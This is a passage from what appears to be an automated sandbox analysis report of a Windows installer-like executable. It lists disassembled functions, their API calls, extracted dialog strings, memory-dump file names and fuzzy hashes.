                                                                                                                • lstrlen.KERNEL32(?,?,00000000), ref: 004A0969
                                                                                                                • WriteFile.KERNEL32(00000000,?,00000000), ref: 004A0972
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004A0975
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Write$lstrlenwsprintf$Valuelstrcat$CloseCreateDirectoryHandlePointerWindowslstrcpylstrcpyn
                                                                                                                • String ID: %s %d %s $%s %lx
                                                                                                                • API String ID: 1992647425-4210052431
                                                                                                                • Opcode ID: 7693f77cba824b88884df65a2f24c29789c625566c2737b0a1c05431334f01fc
                                                                                                                • Instruction ID: ba1b719df58fea2d725c8740a7d74d246acfecf8a347b8b94f43eb98449b9622
                                                                                                                • Opcode Fuzzy Hash: 7693f77cba824b88884df65a2f24c29789c625566c2737b0a1c05431334f01fc
                                                                                                                • Instruction Fuzzy Hash: 0841B6B15403457FE220EB60DC86FFB77ACEB94B04F04491DBB549A1C1D7B4A909CBAA
                                                                                                                Function 004083D8 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 241COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004083DD
                                                                                                                • GetSysColor.USER32(00000014), ref: 00408407
                                                                                                                • GetSysColor.USER32(00000010), ref: 0040840C
                                                                                                                • GetSysColor.USER32(00000010), ref: 00408421
                                                                                                                • FrameRect.USER32(?,?,?), ref: 00408444
                                                                                                                • GetSysColor.USER32(00000014), ref: 00408464
                                                                                                                • GetSysColor.USER32(00000016), ref: 0040847A
                                                                                                                • GetSysColor.USER32(00000010), ref: 0040848D
                                                                                                                • GetSysColor.USER32(00000015), ref: 004084A0
                                                                                                                • GetSysColor.USER32(00000010), ref: 004084CA
                                                                                                                • GetSysColor.USER32(00000014), ref: 004084CF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$FrameH_prologRect
                                                                                                                • String ID: 8pN
                                                                                                                • API String ID: 3885730630-1801615451
                                                                                                                • Opcode ID: cc62c14bd744b624131441a2989cae57d46401ba6f43a7c36051e258d9d19cd7
                                                                                                                • Instruction ID: f8d5d9dd0bb8ae4f0b4db2893dd3dae89874ea5bcc73c51c22347359cc4fe124
                                                                                                                • Opcode Fuzzy Hash: cc62c14bd744b624131441a2989cae57d46401ba6f43a7c36051e258d9d19cd7
                                                                                                                • Instruction Fuzzy Hash: CA815D75A00109AFDF10DFA5C985EAEBBB9EF44304F04842EF59AA6291CB34AD04DB64
                                                                                                                Function 00460864 Relevance: 24.2, APIs: 16, Instructions: 157windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • IsWindow.USER32(?), ref: 00460894
                                                                                                                • GetFocus.USER32 ref: 0046089E
                                                                                                                • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 004608D2
                                                                                                                • IsWindow.USER32(?), ref: 0046090F
                                                                                                                • IsWindowVisible.USER32(?), ref: 00460918
                                                                                                                • IsWindowEnabled.USER32(?), ref: 00460921
                                                                                                                • IsWindow.USER32(?), ref: 00460953
                                                                                                                • IsWindowVisible.USER32(?), ref: 0046095C
                                                                                                                • IsWindowEnabled.USER32(?), ref: 00460965
                                                                                                                • IsWindow.USER32(?), ref: 0046098C
                                                                                                                • IsWindowVisible.USER32(?), ref: 00460995
                                                                                                                • IsWindowEnabled.USER32(?), ref: 0046099E
                                                                                                                • IsWindow.USER32(?), ref: 004609C5
                                                                                                                • IsWindowVisible.USER32(?), ref: 004609CE
                                                                                                                • IsWindowEnabled.USER32(?), ref: 004609D7
                                                                                                                • SendMessageA.USER32(?,000000F4,00000001,00000001), ref: 004609ED
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$EnabledVisible$MessageSend$Focus
                                                                                                                • String ID:
                                                                                                                • API String ID: 2045024204-0
                                                                                                                • Opcode ID: 582e16e3577cbf14ddaf2e1444b3049222b57771f49ac2e0022d1373abeadcae
                                                                                                                • Instruction ID: 905362bf8d03f47b52438668d8c8104c20f2a2c35df8240b65902b00b1b5a3c0
                                                                                                                • Opcode Fuzzy Hash: 582e16e3577cbf14ddaf2e1444b3049222b57771f49ac2e0022d1373abeadcae
                                                                                                                • Instruction Fuzzy Hash: CD51A3713007029FEF305F31DC54B2B76A6AF44781F15423AE941AB3A6EB29DC09CA5A
                                                                                                                Function 00428804 Relevance: 23.2, APIs: 3, Strings: 10, Instructions: 476COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00428809
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                • __ftol.LIBCMT ref: 004288F1
                                                                                                                • __ftol.LIBCMT ref: 00428A07
                                                                                                                  • Part of subcall function 004C6033: lstrlen.KERNEL32(?,?,00000000,004C5E52,005247C8,00403DCA,00000000,00403C1B,00000000,00000000,004019FC,?), ref: 004C6044
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$__ftollstrlen
                                                                                                                • String ID: 0:R$D$DefaultErrorMode$ErrorCode$ErrorMsg$NewConsole$NewProcessGroup$SeparateWOWVDM$Suspended$UnicodeEnvironment
                                                                                                                • API String ID: 2052632373-2322229317
                                                                                                                • Opcode ID: bef0e31a94ecbeec0dee5a79e6a852639d4606ae34685a3ee9bc36585d7d07c6
                                                                                                                • Instruction ID: 86a9d5005b695a4152f2a547f711cfbb316a88eb4b6103e24efc3daf46b3735a
                                                                                                                • Opcode Fuzzy Hash: bef0e31a94ecbeec0dee5a79e6a852639d4606ae34685a3ee9bc36585d7d07c6
                                                                                                                • Instruction Fuzzy Hash: 27E10235906229A9DB18FBA6EC42FDE77789F15328F20011FF500B61C2EF785A85876D
                                                                                                                Function 00414248 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 259COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: A bad pointer has been used.$Advapi32.dll$CreateProcessWithLogonW
                                                                                                                • API String ID: 3519838083-4276160095
                                                                                                                • Opcode ID: da6c3510daa39f07ea12006a9770c9fe477a7265a20e9356a9af3762068283a1
                                                                                                                • Instruction ID: b1d0f99e43904c2a0832fa948a07cdff5dcb46890749a114e5afd31a54da981c
                                                                                                                • Opcode Fuzzy Hash: da6c3510daa39f07ea12006a9770c9fe477a7265a20e9356a9af3762068283a1
                                                                                                                • Instruction Fuzzy Hash: BAA17E74900219EFCF15DFA5C845BEEBBB9AF84304F14412EF112A6291DB789A80CB68
                                                                                                                Function 004548A3 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 244windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004548A8
                                                                                                                  • Part of subcall function 00453857: IsWindow.USER32(00000000), ref: 0045386E
                                                                                                                • SendMessageA.USER32(?,0000018A,?,00000000), ref: 00454931
                                                                                                                • SendMessageA.USER32(?,00000189,?,00000000), ref: 00454949
                                                                                                                • SendMessageA.USER32(?,00000187,?,00000000), ref: 00454963
                                                                                                                  • Part of subcall function 0045C50B: __EH_prolog.LIBCMT ref: 0045C510
                                                                                                                • SendMessageA.USER32(?,0000018A,?,00000000), ref: 00454987
                                                                                                                • SendMessageA.USER32(?,00000189,?,00000000), ref: 0045499F
                                                                                                                  • Part of subcall function 004C6329: lstrlen.KERNEL32(?,00000100,004C9C79,000000FF,?,00000000,000000FF,00000100,?,?,?,00000100,00000000,?), ref: 004C633C
                                                                                                                • SendMessageA.USER32(?,00000187,?,00000000), ref: 004549B9
                                                                                                                  • Part of subcall function 0045C45C: __EH_prolog.LIBCMT ref: 0045C461
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$H_prolog$Windowlstrlen
                                                                                                                • String ID: Checked$Index$Selected$Text$false$true
                                                                                                                • API String ID: 2526461855-4262960588
                                                                                                                • Opcode ID: 392699d910bf1621188656a7b0aebc387bf76bbe049c96ba87718edf53aa44ee
                                                                                                                • Instruction ID: fb5b4e533497bf84aaa86c42b6e575238de286fac3f874d3a72acc2ad7edaa55
                                                                                                                • Opcode Fuzzy Hash: 392699d910bf1621188656a7b0aebc387bf76bbe049c96ba87718edf53aa44ee
                                                                                                                • Instruction Fuzzy Hash: 6691F734500644ABDB05EB76CC56FAEBBA4AF80318F10812EB4159B2D2DB78AE45CB59
                                                                                                                Function 004847B0 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 147COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __ftol.LIBCMT ref: 004847E7
                                                                                                                  • Part of subcall function 004B1FCA: GetLocalTime.KERNEL32(00000000), ref: 004B1FD7
                                                                                                                  • Part of subcall function 004B1FCA: GetSystemTime.KERNEL32(?), ref: 004B1FE1
                                                                                                                • _wctomb_s.LIBCMT ref: 00484918
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Time$LocalSystem__ftol_wctomb_s
                                                                                                                • String ID: `date' format too long$day$hour$isdst$min$month$sec$wday$yday$year
                                                                                                                • API String ID: 667603400-2335568655
                                                                                                                • Opcode ID: 2c0e3f41a8b273ede04ff5c4ba41b961c0be07776424e337bcd465269f9b073f
                                                                                                                • Instruction ID: 5937b14468f23390398eff1e5af1769c89a76d4be87a49388897db95451fadbb
                                                                                                                • Opcode Fuzzy Hash: 2c0e3f41a8b273ede04ff5c4ba41b961c0be07776424e337bcd465269f9b073f
                                                                                                                • Instruction Fuzzy Hash: 1341BEF16402053BF620FA75ECC3EEF765CEBC0714F00491EF99556282EABEA94143A9
                                                                                                                Function 00440A40 Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 429COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00440A45
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                • __ftol.LIBCMT ref: 00440AB1
                                                                                                                • __ftol.LIBCMT ref: 00440AE6
                                                                                                                • __ftol.LIBCMT ref: 00440B1B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog__ftol
                                                                                                                • String ID: 0:R$P$PPassword$PServerAddress$PUserName$Password$UserName
                                                                                                                • API String ID: 2123048387-3909543088
                                                                                                                • Opcode ID: 9e246c428cab53e047da452639eec7834628c60a719ab49924a4789e6ef9a572
                                                                                                                • Instruction ID: c5f0b79ad7f6abfd01c2bea4fda5df8cf40422b8ff3bbb9905142f2ac86fd7e8
                                                                                                                • Opcode Fuzzy Hash: 9e246c428cab53e047da452639eec7834628c60a719ab49924a4789e6ef9a572
                                                                                                                • Instruction Fuzzy Hash: 87D1E335908205A9FB08B7A6DC52FFE76389F12728F20051FF601B51D2EF7C5A52962E
                                                                                                                Function 0046C4F8 Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 90COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0046C4FD
                                                                                                                  • Part of subcall function 004688E5: __EH_prolog.LIBCMT ref: 004688EA
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                  • Part of subcall function 0045FEA5: __EH_prolog.LIBCMT ref: 0045FEAA
                                                                                                                Strings
                                                                                                                • IDS_CTRL_RADIOBTN_PERUSER, xrefs: 0046C590
                                                                                                                • Make shortcuts available to all users, xrefs: 0046C5AC
                                                                                                                • IDS_CTRL_COMBOBOX_SHORTCUTFOLDERS, xrefs: 0046C5F6
                                                                                                                • IDS_CTRL_STATICTEXT_TOPINSTRUCTIONS, xrefs: 0046C52A
                                                                                                                • IDS_CTRL_RADIOBTN_ALLUSERS, xrefs: 0046C5C3
                                                                                                                • Shortcut Folder:, xrefs: 0046C546
                                                                                                                • IDS_CTRL_STATICTEXT_LABEL_01, xrefs: 0046C55D
                                                                                                                • %AppShortcutFolderName%, xrefs: 0046C5DF
                                                                                                                • Install shortcuts for current user only, xrefs: 0046C579
                                                                                                                • The shortcut icons will be created in the folder indicated below. If you don't want to use the default folder, you can either type a new name, or select an existing folder from the list., xrefs: 0046C516
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$lstrlen
                                                                                                                • String ID: %AppShortcutFolderName%$IDS_CTRL_COMBOBOX_SHORTCUTFOLDERS$IDS_CTRL_RADIOBTN_ALLUSERS$IDS_CTRL_RADIOBTN_PERUSER$IDS_CTRL_STATICTEXT_LABEL_01$IDS_CTRL_STATICTEXT_TOPINSTRUCTIONS$Install shortcuts for current user only$Make shortcuts available to all users$Shortcut Folder:$The shortcut icons will be created in the folder indicated below. If you don't want to use the default folder, you can either type a new name, or select an existing folder from the list.
                                                                                                                • API String ID: 3243491680-1364183510
                                                                                                                • Opcode ID: a6b6c61d03f4ca76ea35b15e6d5ae3995b9d42fa2eb3fc4842eee1967b6da1d6
                                                                                                                • Instruction ID: ccb8799adeed2a51f35749a3196474a1a389b5bf558dac29c4efb1e1255f382f
                                                                                                                • Opcode Fuzzy Hash: a6b6c61d03f4ca76ea35b15e6d5ae3995b9d42fa2eb3fc4842eee1967b6da1d6
                                                                                                                • Instruction Fuzzy Hash: 8D318BB4625709B7DB08BB5AC907ADE7EB4AF45B64F10420EF011632D2CB75174085EB
                                                                                                                Function 004A0990 Relevance: 18.1, APIs: 12, Instructions: 87filestringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • TlsGetValue.KERNEL32(0000001C,?), ref: 004A099D
                                                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004A09C3
                                                                                                                  • Part of subcall function 004A1F10: TlsGetValue.KERNEL32(0000001C,?,00000000,?,00000000,004A0AEA,00000065,00000000,00000104), ref: 004A1F1A
                                                                                                                  • Part of subcall function 004A1F10: lstrcpy.KERNEL32(00000000,00523A30), ref: 004A1F3E
                                                                                                                • lstrcpyn.KERNEL32(?,00000000,?,00000104), ref: 004A09E3
                                                                                                                • lstrcat.KERNEL32(?,00510870), ref: 004A0A04
                                                                                                                • lstrcat.KERNEL32(?,?), ref: 004A0A13
                                                                                                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000004,00000080,00000000,?,00000104), ref: 004A0A2C
                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00000318,00000000,?,00000104), ref: 004A0A42
                                                                                                                • WriteFile.KERNEL32(00000000,00511394,00000002,?,00000000,?,00000104), ref: 004A0A5D
                                                                                                                • lstrlen.KERNEL32(?,?,00000000,?,00000104), ref: 004A0A6E
                                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000104), ref: 004A0A77
                                                                                                                • WriteFile.KERNEL32(00000000,00511394,00000002,?,00000000,?,00000104), ref: 004A0A88
                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000104), ref: 004A0A8B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Write$Valuelstrcat$CloseCreateDirectoryHandlePointerWindowslstrcpylstrcpynlstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3960242371-0
                                                                                                                • Opcode ID: b0bd460c93b43f10fbb35235c7ed9f2e226f1bf64a41e7597b5cd37ac4d247b2
                                                                                                                • Instruction ID: b0b316e7fcd3fa58e7816bf0b84c32f351f63135d6f55a482bb6d2f4a839117b
                                                                                                                • Opcode Fuzzy Hash: b0bd460c93b43f10fbb35235c7ed9f2e226f1bf64a41e7597b5cd37ac4d247b2
                                                                                                                • Instruction Fuzzy Hash: 79213B752403457FE220DB50DC8AFEB776CEB94B50F018928F754AA1D1D7B464058BA9
                                                                                                                Function 00434A0E Relevance: 18.0, APIs: 5, Strings: 5, Instructions: 470COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00434A13
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 0041F1C0: __EH_prolog.LIBCMT ref: 0041F1C5
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                  • Part of subcall function 004C5FE3: InterlockedIncrement.KERNEL32(-000000F4), ref: 004C6026
                                                                                                                • __ftol.LIBCMT ref: 00434BEF
                                                                                                                • __ftol.LIBCMT ref: 00434C16
                                                                                                                • __ftol.LIBCMT ref: 00434DA9
                                                                                                                  • Part of subcall function 0041EDCC: __EH_prolog.LIBCMT ref: 0041EDD1
                                                                                                                  • Part of subcall function 004C6033: lstrlen.KERNEL32(?,?,00000000,004C5E52,005247C8,00403DCA,00000000,00403C1B,00000000,00000000,004019FC,?), ref: 004C6044
                                                                                                                • __ftol.LIBCMT ref: 00434D1C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
